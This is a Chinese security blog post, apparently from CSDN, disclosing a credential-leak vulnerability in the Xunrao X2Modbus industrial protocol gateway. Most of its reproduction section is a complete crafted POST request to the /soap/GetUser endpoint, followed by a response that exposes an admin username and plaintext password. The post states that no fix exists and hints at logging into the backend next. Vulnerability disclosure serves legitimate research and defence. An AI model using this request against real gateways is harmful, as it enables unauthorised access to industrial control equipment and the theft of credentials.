讯饶科技 X2Modbus 敏感信息泄露

这篇文章揭示了讯饶科技X2Modbus设备中存在一个getuser接口的漏洞,该接口会泄露账号密码等敏感信息。攻击者可以通过构造请求包复现漏洞,目前暂无官方修复建议。本文旨在学习交流安全技术,使用时需注意潜在风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

讯饶科技 X2Modbus 敏感信息泄露

漏洞描述

X2Modbus是一款功能很强大的协议转换网关, 这里的X代表各家不同
的通信协议,2是To的谐音表示转换,Modbus就是最终支持的标准协议
是Modbus协议。使得用户可以根据现场设备的通信协议进行配置,转成
标准的Modbus协议。在PC端仿真运行无误后,上传到硬件协议转换网
关。
在其中存在一个可以getuser的接口,其中就会泄露账号密码等信息

影响版本

不详

实现原理

通过调用getuser接口来获取账号密码信息,从而可以登录后台

漏洞复现

在这里插入图片描述
接口在/soap/GetUser构造请求数据包

POST /soap/GetUser  HTTP/1.1
Host: 0.0.0.0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://0.0.0.0/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zh-cn; username=admin1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 58


<GetUser><User Name="admin" Password="admin"/></GetUser>

查看返回包

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/xml; charset=utf-8
Set-Cookie: language=zh-cn; username=admin1
Content-Length: 407
<soap:Body>
<GetUserResult>
<UserName>admin</UserName>
<PassWord>admin123456</PassWord>
<Purview>4</Purview>
</GetUserResult>
</soap:Body>
</soap:Envelope>

emmm这里就复现成功了,接下来师傅们懂得

修复建议

暂无

注: 文章只为学习交流安全技术,有人非法盈利后果自行承担

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值